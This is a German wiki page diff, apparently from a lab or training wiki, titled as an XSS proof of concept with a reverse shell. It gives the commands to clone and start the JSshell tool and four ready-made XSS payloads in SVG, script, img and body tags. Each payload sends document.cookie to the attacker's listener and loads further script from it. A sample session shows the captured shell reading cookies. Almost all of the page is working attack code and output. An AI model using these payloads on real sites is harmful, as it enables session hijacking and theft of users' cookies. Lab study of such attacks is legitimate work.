Xss-poc-reverse-shell: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
(→start) |
(→start) |
||
| Zeile 19: | Zeile 19: | ||
Listening on [any] 5555 for incoming JS shell ... | Listening on [any] 5555 for incoming JS shell ... | ||
</pre> | </pre> | ||
| + | =Die Shell= | ||
| + | Listening on [any] 5555 for incoming JS shell ... | ||
| + | Got JS shell from [10.85.70.1] port 53146 to orville 5555 | ||
| + | >>> var test = 'hacked by xinux' | ||
| + | >>> confirm(test) | ||
| + | >>> prompt(document.cookie) | ||
Version vom 27. Juli 2021, 18:45 Uhr
git clone
- git clone https://github.com/shelld3v/JSshell/
- cd JSshell/
- chmod +x jsh.py
start
- ./jsh.py -g -p 5555 -s 10.85.70.1
__
|(_ _ |_ _ | |
\_|__)_> | |(/_ | |
v3.1
Payloads:
- SVG: <svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.85.70.1:5555/?"+document.cookie},1010)>
- SCRIPT: <script>setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.85.70.1:5555/?"+document.cookie},1010)</script>
- IMG: <img src=x onerror=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.85.70.1:5555/?"+document.cookie},1010)>
- BODY: <body onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.85.70.1:5555/?"+document.cookie}></body>
Listening on [any] 5555 for incoming JS shell ...
Die Shell
Listening on [any] 5555 for incoming JS shell ... Got JS shell from [10.85.70.1] port 53146 to orville 5555 >>> var test = 'hacked by xinux' >>> confirm(test) >>> prompt(document.cookie)
